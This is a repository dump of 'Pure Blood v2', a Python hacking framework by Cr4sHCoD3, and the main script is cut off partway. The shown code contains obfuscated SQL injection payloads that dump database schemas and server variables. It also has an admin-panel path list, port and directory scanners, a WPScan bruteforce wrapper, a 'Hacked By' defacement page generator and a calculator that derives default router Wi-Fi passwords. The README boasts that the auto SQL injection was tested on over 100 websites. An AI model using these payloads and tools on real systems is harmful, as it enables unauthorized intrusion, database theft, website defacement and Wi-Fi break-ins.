├── .gitignore
├── LICENSE
├── README.md
├── imgs
    ├── PureBlood LOGO.png
    └── banner.jpg
├── l33t
    ├── rfi.txt
    ├── ver.txt
    └── wot.txt
├── pureblood.py
└── requirements.txt


/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST

# PyInstaller
#  Usually these files are written by a python script from a template
#  before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py
db.sqlite3

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
target/

# Jupyter Notebook
.ipynb_checkpoints

# pyenv
.python-version

# celery beat schedule file
celerybeat-schedule

# SageMath parsed files
*.sage.py

# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/

# Spyder project settings
.spyderproject
.spyproject

# Rope project settings
.ropeproject

# mkdocs documentation
/site

# mypy
.mypy_cache/
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2018 Jerald Dale

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Pure Blood

[![License](https://img.shields.io/badge/Licenese-MIT-blue.svg?longCache=true&style=flat)](https://github.com/cr4shcod3/pureblood/blob/master/LICENSE) [![Compatible](https://img.shields.io/badge/Compatible%20On-Any-yellowgreen.svg?longCache=true&style=flat)](https://en.wikipedia.org/wiki/Operating_system) [![Python2x](https://img.shields.io/badge/Python-2x-brightgreen.svg?longCache=true&style=flat)](https://www.python.org/downloads) [![Python3x](https://img.shields.io/badge/Python-3x-brightgreen.svg?longCache=true&style=flat)](https://www.python.org/downloads)

# Pure Blood v2

> A Penetration Testing Framework created for Hackers / Pentester / Bug Hunter

# Menu

### Web Pentest / Information Gathering:
- Banner Grab
- Whois
- Traceroute
- DNS Record
- Reverse DNS Lookup
- Zone Transfer Lookup
- Port Scan
- Admin Panel Scan
- Subdomain Scan
- CMS Identify
- Reverse IP Lookup
- Subnet Lookup
- Extract Page Links
- Directory Fuzz (NEW)
- File Fuzz (NEW)
- Shodan Search (NEW)
- Shodan Host Lookup (NEW)
#### Web Application Attack: (NEW)
- Wordpress
    | WPScan
    | WPScan Bruteforce
    | Wordpress Plugin Vulnerability Checker
        Features: // I will add more soon.
        | WordPress Woocommerce - Directory Traversal
        | Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting
        | WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
        | WordPress Plugin Events Calendar - 'event_id' SQL Injection
- Auto SQL Injection
    Features:
    | Union Based
    | (Error Output = False) Detection
    | Tested on 100+ Websites
### Generator:
- Deface Page
- Password Generator // NEW
- Text To Hash //NEW

# Author's Words:
This project is managed / enhanced every day and sorry if it takes a while before another version is published. Well, I'm the only one who is managing this and also I have personal daily activities. This tool is for everyone. So please open an issue if you run into a bug. Well I can only test it in Windows and Kali Linux since that's the only device I have. Also please try the new AUTO SQL Injection that I'm proud of currently. I created a video already on how I created it. Check it out on my Youtube Channel. The WPScan is also checked for Windows and Kali Linux. If you are using other Linux Distro please add wpscan in your ~/.bashrc.

# Installation

> Any Python Version.

```
$ git clone https://github.com/cr4shcod3/pureblood
$ cd pureblood
$ pip install -r requirements.txt
```

# DEMO

## Web Pentest
[![asciicast](https://asciinema.org/a/193579.png)](https://asciinema.org/a/193579)

## Web Application Attack
[![asciicast](https://asciinema.org/a/193578.png)](https://asciinema.org/a/193578)

# Build With
* [Colorama](https://pypi.org/project/colorama)
* [Requests](https://github.com/requests/requests)
* [Python-whois](https://pypi.org/project/python-whois)
* [Dnspython](http://www.dnspython.org)
* [BeautifulSoup](https://www.crummy.com/software/BeautifulSoup)
* [Shodan](https://shodan.readthedocs.io/en/latest/)

## Contributing
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change. You can also suggest a feature, just open an issue.
You can also:
[![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/f4a5kJcyl)

## Authors
* [Cr4sHCoD3](https://www.facebook.com/cr4shcod3.py) - Pure Blood

## License
This project is licensed under the [MIT License](https://choosealicense.com/licenses/mit) - see the [LICENSE](https://github.com/cr4shcod3/pureblood/blob/master/LICENSE) file for details
--------------------------------------------------------------------------------
/imgs/PureBlood LOGO.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChesZy2810/https-github.com-cr4shcod3-pureblood/2c5ce07feea7e4f5a46aeba6140414544244d47f/imgs/PureBlood LOGO.png
--------------------------------------------------------------------------------
/imgs/banner.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ChesZy2810/https-github.com-cr4shcod3-pureblood/2c5ce07feea7e4f5a46aeba6140414544244d47f/imgs/banner.jpg
--------------------------------------------------------------------------------
/l33t/rfi.txt:
--------------------------------------------------------------------------------
PureBlood RFI ~Cr4sHCoD3
--------------------------------------------------------------------------------
/l33t/ver.txt:
--------------------------------------------------------------------------------
2
--------------------------------------------------------------------------------
/l33t/wot.txt:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/pureblood.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
    Cr4sHCoD3
Github:
    https://github.com/cr4shcod3
FB Page:
    https://facebook.com/cr4shcod3.py
Youtube:
    https://www.youtube.com/channel/UCEw5DaWEUY0XeUOTl1U2LKw
Buy Me A Coffee:
    https://www.buymeacoffee.com/f4a5kJcyl
Google Plus:
    https://plus.google.com/u/0/115239095310355713855
Copyrights:
    Cr4sHCoD3 2018
    MIT LICENSE
Special Mentions:
    PureHackers PH
    Blood Security Hackers
"""


import os
import sys
import platform
import time
import datetime
import re
import threading
import socket
import webbrowser
import hashlib
import random
import subprocess
import zipfile


if sys.version_info[0] == 3:
    from urllib.parse import urlparse
elif sys.version_info[0] == 2:
    from urlparse import urlparse


try:
    import colorama
    colorama.init()
except:
    print ('[!] - Module (colorama) not installed!')
    sys.exit()


try:
    import requests
    from requests.exceptions import ConnectionError
except:
    print ('[!] - Module (requests) not installed!')
    sys.exit()


try:
    import whois
except:
    print ('[!] - Module (python-whois) not installed!')
    sys.exit()


try:
    import dns.resolver
except:
    print ('[!] - Module (dnspython) not installed!')
    sys.exit()


try:
    from bs4 import BeautifulSoup
except:
    print ('[!] - Module (bs4) not installed!')
    sys.exit()


try:
    import shodan
except:
    print ('[!] 
- Module (shodan) not installed!') 94 | sys.exit() 95 | 96 | 97 | 98 | ######################################################################################################################################################### 99 | # GLOBAL 100 | 101 | FNULL = open(os.devnull, 'w') 102 | google_hacking = 'https://www.google.com/search?q=' 103 | dios1 = '(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(InFoRMAtiON_sCHeMa.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c7374726f6e672069643d2250757265426c6f6f64223e5461626c653a20,TaBLe_nAMe,0x203d3d20,column_name,0x3c2f7374726f6e673e3c62723e))))a)' 104 | sqli_payload_hostname = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@hostname,0x3c2f7374726f6e673e)' 105 | sqli_payload_tmpdir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@tmpdir,0x3c2f7374726f6e673e)' 106 | sqli_payload_datadir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@datadir,0x3c2f7374726f6e673e)' 107 | sqli_payload_version = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@version,0x3c2f7374726f6e673e)' 108 | sqli_payload_basedir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@basedir,0x3c2f7374726f6e673e)' 109 | sqli_payload_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,user(),0x3c2f7374726f6e673e)' 110 | sqli_payload_database = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,database(),0x3c2f7374726f6e673e)' 111 | sqli_payload_schema = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,schema(),0x3c2f7374726f6e673e)' 112 | sqli_payload_uuid = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,UUID(),0x3c2f7374726f6e673e)' 113 | sqli_payload_system_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,system_user(),0x3c2f7374726f6e673e)' 114 | sqli_payload_session_user = 
'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,session_user(),0x3c2f7374726f6e673e)' 115 | sqli_payload_symlink = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_symlink,0x3c2f7374726f6e673e)' 116 | sqli_payload_ssl = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_ssl,0x3c2f7374726f6e673e)' 117 | sqli_dump_column_payload = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,,0x3c2f7374726f6e673e)' 118 | 119 | ## Color 120 | reset = '\033[0m' 121 | bold = '\033[1m' 122 | underline = '\033[4m' 123 | ### Fore 124 | black = '\033[90m'; red = '\033[91m'; green = '\033[92m'; yellow = '\033[93m'; blue = '\033[94m'; magenta = '\033[95m'; cyan = '\033[96m'; white = '\033[97m' 125 | ### Background 126 | bg_black = '\033[90m'; bg_red = '\033[91m'; bg_green = '\033[92m'; bg_yellow = '\033[93m'; bg_blue = '\033[94m'; bg_magenta = '\033[95m'; bg_cyan = '\033[96m'; bg_white = '\033[97m' 127 | 128 | ## Configuration 129 | if platform.system() == 'Windows': 130 | from ctypes import windll, create_string_buffer 131 | h = windll.kernel32.GetStdHandle(-12) 132 | csbi = create_string_buffer(22) 133 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) 134 | if res: 135 | try: 136 | import struct 137 | (bufx, bufy, curx, cury, wattr, 138 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) 139 | sizex = right - left + 1 140 | sizey = bottom - top + 1 141 | except: 142 | print("[!] 
- Module (struct) not installed!")
    else:
        sizex, sizey = 80, 25
elif platform.system() == 'Linux' or platform.system() == 'Darwin':
    sizey, sizex = os.popen('stty size', 'r').read().split()
else:
    sizex = 50

## Date Time
month = datetime.date.today().strftime("%B")
if datetime.date.today().strftime("%w") == 1 or datetime.date.today().strftime("%w") == '1':
    day = 'Monday'
elif datetime.date.today().strftime("%w") == 2 or datetime.date.today().strftime("%w") == '2':
    day = 'Tuesday'
elif datetime.date.today().strftime("%w") == 3 or datetime.date.today().strftime("%w") == '3':
    day = 'Wednesday'
elif datetime.date.today().strftime("%w") == 4 or datetime.date.today().strftime("%w") == '4':
    day = 'Thursday'
elif datetime.date.today().strftime("%w") == 5 or datetime.date.today().strftime("%w") == '5':
    day = 'Friday'
elif datetime.date.today().strftime("%w") == 6 or datetime.date.today().strftime("%w") == '6':
    day = 'Saturday'
elif datetime.date.today().strftime("%w") == 7 or datetime.date.today().strftime("%w") == '0':
    day = 'Sunday'
mday = datetime.date.today().strftime("%d")
year = datetime.date.today().strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')

## List
ids = [
    'NONE','A','NS','MD','MF','CNAME','SOA','MB','MG','MR','NULL','WKS','PTR','HINFO','MINFO','MX','TXT','RP','AFSDB','X25','ISDN','RT','NSAP','NSAP-PTR','SIG','KEY','PX','GPOS','AAAA','LOC','NXT','SRV','NAPTR','KX','CERT','A6','DNAME','OPT','APL','DS','SSHFP','IPSECKEY','RRSIG','NSEC','DNSKEY','DHCID','NSEC3','NSEC3PARAM','TLSA','HIP','CDS','CDNSKEY','CSYNC','SPF','UNSPEC','EUI48','EUI64','TKEY','TSIG','IXFR','AXFR','MAILB','MAILA','ANY','URI','CAA','TA','DLV'
]
admin_panel_list = 
['/admin.aspx','/admin.asp','/admin.php','/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php','/joomla/administrator','/login.php','/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html','/admin/login.html','/admin/admin.html','/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html','/admin/controlpanel.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html','webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html','/admin/cp.php','cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php','/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php','/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/modelsearch/login.php','/moderator.php','/moderator/login.php','/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php','/admin/adminLogin.html','/adminLogin.html','/admin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html','/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','cp.html','/adminpanel.php','/moderator.html','/administrator/index.
html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html','/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html','/admincontrol/login.html','/adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html','/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/adminarea/index.php','/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php','/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php','adm/index.php','adm.php','affiliate.php','/adm_auth.php ','/memberadmin.php','/administratorlogin.php','/login/admin.asp','/admin/login.asp','/administratorlogin.asp','/login/asmindstrator.asp','/admin/login.aspx','/login/admin.aspx','/administartorlogin.aspx','login/administrator.aspx','/adminlogin.asp','a/dminlogin.aspx','/admin_login.asp','/admin_login.aspx','/adminhome.asp','/adminhome.aspx''/administrator_login.asp','/administrator_login.aspx'] 176 | admin_panel_valid = [] 177 | 178 | dbms_errors = { 179 | 'MySQL': (r'SQL syntax.*MySQL', r'Warning.*mysql_.*', r'MySQL Query fail.*', r'SQL syntax.*MariaDB server'), 180 | 'PostgreSQL': (r'PostgreSQL.*ERROR', r'Warning.*\Wpg_.*', r'Warning.*PostgreSQL'), 181 | 'Microsoft SQL Server': (r'OLE DB.* SQL Server', r'(\W|\A)SQL Server.*Driver', r'Warning.*odbc_.*', r'Warning.*mssql_', r'Msg \d+, Level \d+, State \d+', r'Unclosed quotation mark after the character string', r'Microsoft OLE DB Provider for ODBC Drivers'), 182 | 'Microsoft Access': (r'Microsoft Access Driver', r'Access Database Engine', r'Microsoft JET Database Engine', r'.*Syntax error.*query 
expression'), 183 | 'Oracle': (r'\bORA-[0-9][0-9][0-9][0-9]', r'Oracle error', r'Warning.*oci_.*', 'Microsoft OLE DB Provider for Oracle'), 184 | 'IBM DB2': (r'CLI Driver.*DB2', r'DB2 SQL error'), 185 | 'SQLite': (r'SQLite/JDBCDriver', r'System.Data.SQLite.SQLiteException'), 186 | 'Informix': (r'Warning.*ibase_.*', r'com.informix.jdbc'), 187 | 'Sybase': (r'Warning.*sybase.*', r'Sybase message') 188 | } 189 | 190 | ## Threading Object Funtions 191 | def TCP_connect(ip, port_number, delay, output): 192 | TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 193 | TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 194 | TCPsock.settimeout(delay) 195 | try: 196 | TCPsock.connect((ip, port_number)) 197 | output[port_number] = 'Open' 198 | except: 199 | output[port_number] = '' 200 | 201 | def dns_record_scanner(drs_hostname, ids_item, dns_record_list): 202 | try: 203 | answers = dns.resolver.query(drs_hostname, ids_item) 204 | for rdata in answers: 205 | ids_item = str(ids_item); rdata = str(rdata) 206 | dns_record_list.append(str(ids_item + ' : ' + rdata)) 207 | except Exception: 208 | print("The scanner Error has happened, we will continue") 209 | pass 210 | 211 | def subdomain_scanner(subdomain, so_200, so_301, so_302, so_403): 212 | subdomain = 'http://' + subdomain 213 | try: 214 | subdomain_scanner_request = requests.get(subdomain) 215 | subdomain_scanner_code = subdomain_scanner_request.status_code 216 | if subdomain_scanner_code == 200: 217 | so_200.append(subdomain) 218 | elif subdomain_scanner_code == 301: 219 | so_301.append(subdomain) 220 | elif subdomain_scanner_code == 302: 221 | so_302.append(subdomain) 222 | elif subdomain_scanner_code == 403: 223 | so_403.append(subdomain) 224 | except ConnectionError: 225 | print("Connection Error has happened, we will continue") 226 | pass 227 | 228 | def directory_scanner(ds_url_list, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3): 229 | try: 230 | directory_fuzz_request = 
requests.get(ds_url_list) 231 | if directory_fuzz_request.status_code == 200: 232 | directory_fuzz_final1.append(ds_url_list) 233 | elif directory_fuzz_request.status_code == 301 or directory_fuzz_request.status_code == 302: 234 | directory_fuzz_final2.append(ds_url_list) 235 | elif directory_fuzz_request.status_code == 403: 236 | directory_fuzz_final3.append(ds_url_list) 237 | except: 238 | print("Scanner Error has happened, we will continue") 239 | pass 240 | 241 | def file_scanner(fs_url_list, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3): 242 | try: 243 | file_fuzz_request = requests.get(fs_url_list) 244 | if file_fuzz_request.status_code == 200: 245 | file_fuzz_final1.append(fs_url_list) 246 | elif file_fuzz_request.status_code == 301 or file_fuzz_request.status_code == 302: 247 | file_fuzz_final2.append(fs_url_list) 248 | elif file_fuzz_request.status_code == 403: 249 | file_fuzz_final3.append(fs_url_list) 250 | except: 251 | print("Scanner Issue has arised, we will continue") 252 | pass 253 | # END GLOBAL 254 | ######################################################################################################################################################### 255 | 256 | class Generator: 257 | def deface_page(self, title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups): 258 | deface_page_template = ''' 259 | 260 | 261 | --=[ Hacked By {0} ]=-- 262 | 263 | 264 | 265 | 266 | 267 | 268 | 269 | 270 | 271 | 274 | 275 | 276 |
277 |
278 | 279 |

Hacked By {5}



280 |

{6}

281 |

{7}



282 |

Greetings: {8}

283 |
284 |
285 | 286 | 287 | '''.format(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups, '@import') 288 | self.deface_page_result = deface_page_template 289 | return self.deface_page_result 290 | 291 | def password_generator(self, length, text): 292 | password_generator_final1 = '' 293 | password_generator_final2 = '' 294 | password_generator_final3 = '' 295 | chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-_=+[{}];:\'"\|,<.>/?`~' 296 | for i in range(length): 297 | char_random = random.choice(chars) 298 | password_generator_final1 += char_random 299 | password_generator_final2 = hashlib.md5(text.encode('utf-8')).hexdigest() 300 | l33t_alphabet = ['4','8','(','|)','3','|=','9','#','1','_|','|<','|_','|\/|','|\|','0','|D','(,)','|2','$','7','|_|','\/','\/\/','><','\'/','(/)'] 301 | for i in text: 302 | if i == 'a' or i == 'A': 303 | text = text.replace('a', l33t_alphabet[0]).replace('A', l33t_alphabet[0]) 304 | elif i == 'b' or i == 'B': 305 | text = text.replace('b', l33t_alphabet[1]).replace('B', l33t_alphabet[1]) 306 | elif i == 'c' or i == 'C': 307 | text = text.replace('c', l33t_alphabet[2]).replace('C', l33t_alphabet[2]) 308 | elif i == 'd' or i == 'D': 309 | text = text.replace('d', l33t_alphabet[3]).replace('D', l33t_alphabet[3]) 310 | elif i == 'e' or i == 'E': 311 | text = text.replace('e', l33t_alphabet[4]).replace('E', l33t_alphabet[4]) 312 | elif i == 'f' or i == 'F': 313 | text = text.replace('f', l33t_alphabet[5]).replace('F', l33t_alphabet[5]) 314 | elif i == 'g' or i == 'G': 315 | text = text.replace('g', l33t_alphabet[6]).replace('G', l33t_alphabet[6]) 316 | elif i == 'h' or i == 'H': 317 | text = text.replace('h', l33t_alphabet[7]).replace('H', l33t_alphabet[7]) 318 | elif i == 'i' or i == 'I': 319 | text = text.replace('i', l33t_alphabet[8]).replace('I', l33t_alphabet[8]) 320 | elif i == 'j' or i == 'J': 321 | text = text.replace('j', l33t_alphabet[9]).replace('J', 
l33t_alphabet[9]) 322 | elif i == 'k' or i == 'K': 323 | text = text.replace('k', l33t_alphabet[10]).replace('K', l33t_alphabet[10]) 324 | elif i == 'l' or i == 'L': 325 | text = text.replace('l', l33t_alphabet[11]).replace('L', l33t_alphabet[11]) 326 | elif i == 'm' or i == 'M': 327 | text = text.replace('m', l33t_alphabet[12]).replace('M', l33t_alphabet[12]) 328 | elif i == 'n' or i == 'N': 329 | text = text.replace('n', l33t_alphabet[13]).replace('N', l33t_alphabet[13]) 330 | elif i == 'o' or i == 'O': 331 | text = text.replace('o', l33t_alphabet[14]).replace('O', l33t_alphabet[14]) 332 | elif i == 'p' or i == 'P': 333 | text = text.replace('p', l33t_alphabet[15]).replace('P', l33t_alphabet[15]) 334 | elif i == 'q' or i == 'Q': 335 | text = text.replace('q', l33t_alphabet[16]).replace('Q', l33t_alphabet[16]) 336 | elif i == 'r' or i == 'R': 337 | text = text.replace('r', l33t_alphabet[17]).replace('R', l33t_alphabet[17]) 338 | elif i == 's' or i == 'S': 339 | text = text.replace('s', l33t_alphabet[18]).replace('S', l33t_alphabet[18]) 340 | elif i == 't' or i == 'T': 341 | text = text.replace('t', l33t_alphabet[19]).replace('T', l33t_alphabet[19]) 342 | elif i == 'u' or i == 'U': 343 | text = text.replace('u', l33t_alphabet[20]).replace('U', l33t_alphabet[20]) 344 | elif i == 'v' or i == 'V': 345 | text = text.replace('v', l33t_alphabet[21]).replace('V', l33t_alphabet[21]) 346 | elif i == 'w' or i == 'W': 347 | text = text.replace('w', l33t_alphabet[22]).replace('W', l33t_alphabet[22]) 348 | elif i == 'x' or i == 'X': 349 | text = text.replace('x', l33t_alphabet[23]).replace('X', l33t_alphabet[23]) 350 | elif i == 'y' or i == 'Y': 351 | text = text.replace('y', l33t_alphabet[24]).replace('Y', l33t_alphabet[24]) 352 | elif i == 'z' or i == 'Z': 353 | text = text.replace('z', l33t_alphabet[25]).replace('Z', l33t_alphabet[25]) 354 | password_generator_final3 = text 355 | self.password_generator_result1 = password_generator_final1 356 | 
self.password_generator_result2 = password_generator_final2 357 | self.password_generator_result3 = password_generator_final3 358 | return self.password_generator_result1, self.password_generator_result2, self.password_generator_result3 359 | 360 | def pldt_password_calculator(self, digit5, mac5): 361 | pldt_password_calculator_final1 = ['PLDTWIFI' + digit5, 'pldtwifi'+ digit5] 362 | pldt_password_calculator_final2_multiply = digit5 * 3 363 | pldt_password_calculator_final2 = ['PLDTWIFI' + pldt_password_calculator_final2_multiply, 'pldtwifi' + pldt_password_calculator_final2_multiply] 364 | digit55 = digit5 365 | for i in digit55: 366 | if i == '0': 367 | digit55.replace('0', 'f') 368 | elif i == '4': 369 | digit55.replace('4', 'b') 370 | elif i == '8': 371 | digit55.replace('8', '7') 372 | elif i == 'c': 373 | digit55.replace('c', '3') 374 | elif i == '1': 375 | digit55.replace('1', 'e') 376 | elif i == '5': 377 | digit55.replace('5', 'a') 378 | elif i == '9': 379 | digit55.replace('9', '6') 380 | elif i == 'd': 381 | digit55.replace('d', '2') 382 | elif i == '2': 383 | digit55.replace('2', 'd') 384 | elif i == '6': 385 | digit55.replace('6', '9') 386 | elif i == 'a': 387 | digit55.replace('a', '5') 388 | elif i == 'e': 389 | digit55.replace('e', '1') 390 | elif i == '3': 391 | digit55.replace('3', 'c') 392 | elif i == '7': 393 | digit55.replace('7', '8') 394 | elif i == 'b': 395 | digit55.replace('b', '4') 396 | elif i == 'f': 397 | digit55.replace('f', '0') 398 | pldt_password_calculator_final3 = 'wlan' + digit55 399 | pldt_password_calculator_final4 = ['PLDTWIFI' + digit55, 'pldtwifi' + digit55] 400 | pldt_password_calculator_final5 = 'HomeBro_' + mac5 401 | self.pldt_password_calculator_result1 = pldt_password_calculator_final1 402 | self.pldt_password_calculator_result2 = pldt_password_calculator_final2 403 | self.pldt_password_calculator_result3 = pldt_password_calculator_final3 404 | self.pldt_password_calculator_result4 = pldt_password_calculator_final4 
405 | self.pldt_password_calculator_result5 = pldt_password_calculator_final5 406 | return self.pldt_password_calculator_result1, self.pldt_password_calculator_result2, self.pldt_password_calculator_result3, self.pldt_password_calculator_result4, self.pldt_password_calculator_result5 407 | 408 | def text_to_hash(self, text): 409 | md5_final = hashlib.md5(text.encode('utf-8')).hexdigest() 410 | sha1_final = hashlib.sha1(text.encode('utf-8')).hexdigest() 411 | sha224_final = hashlib.sha224(text.encode('utf-8')).hexdigest() 412 | sha256_final = hashlib.sha256(text.encode('utf-8')).hexdigest() 413 | sha384_final = hashlib.sha384(text.encode('utf-8')).hexdigest() 414 | sha512_final = hashlib.sha512(text.encode('utf-8')).hexdigest() 415 | md4 = hashlib.new('md4') 416 | md4.update(text.encode('utf-8')) 417 | md4_final = md4.hexdigest() 418 | ripemd160 = hashlib.new('ripemd160') 419 | ripemd160.update(text.encode('utf-8')) 420 | ripemd160_final = ripemd160.hexdigest() 421 | whirlpool = hashlib.new('whirlpool') 422 | whirlpool.update(text.encode('utf-8')) 423 | whirlpool_final = whirlpool.hexdigest() 424 | text_to_hash_final = """ 425 | Text To Hash Result: 426 | [+] MD4: {0} 427 | [+] MD5: {1} 428 | [+] SHA1: {2} 429 | [+] SHA224: {3} 430 | [+] SHA256: {4} 431 | [+] SHA384: {5} 432 | [+] SHA512: {6} 433 | [+] RipeMD160: {7} 434 | [+] Whirlpool: {8} 435 | """.format(md4_final, md5_final, sha1_final, sha224_final, sha256_final, sha384_final, sha512_final, ripemd160_final, whirlpool_final) 436 | self.text_to_hash_result = text_to_hash_final 437 | return self.text_to_hash_result 438 | 439 | 440 | 441 | class WebApplicationAttack: 442 | def wp_scan(self, url): 443 | wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 444 | if wp_scan_test_ruby_command == 0: 445 | pass 446 | elif wp_scan_test_ruby_command == 1: 447 | print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow)) 448 | print 
('Ruby Installer: https://rubyinstaller.org/') 449 | time.sleep(2) 450 | print ('') 451 | web_application_attack() 452 | if platform.system() == 'Windows': 453 | if not os.path.exists('external/wpscan-master'): 454 | wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 455 | if wp_scan_download_curl == 0: 456 | wp_scan_unzip = zipfile.ZipFile('master.zip', 'r') 457 | wp_scan_unzip.extractall('external/') 458 | wp_scan_unzip.close() 459 | os.remove('master.zip') 460 | elif wp_scan_download_curl == 1: 461 | if os.path.exists('external/wpscan'): 462 | os.rename('external/wpscan', 'external/wpscan-master') 463 | else: 464 | wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT) 465 | if wp_scan_download_git == 0: 466 | os.rename('external/wpscan', 'external/wpscan-master') 467 | elif wp_scan_download_git == 1: 468 | print ('\n{2}[{1}!{2}] {3}- {1}Please install curl 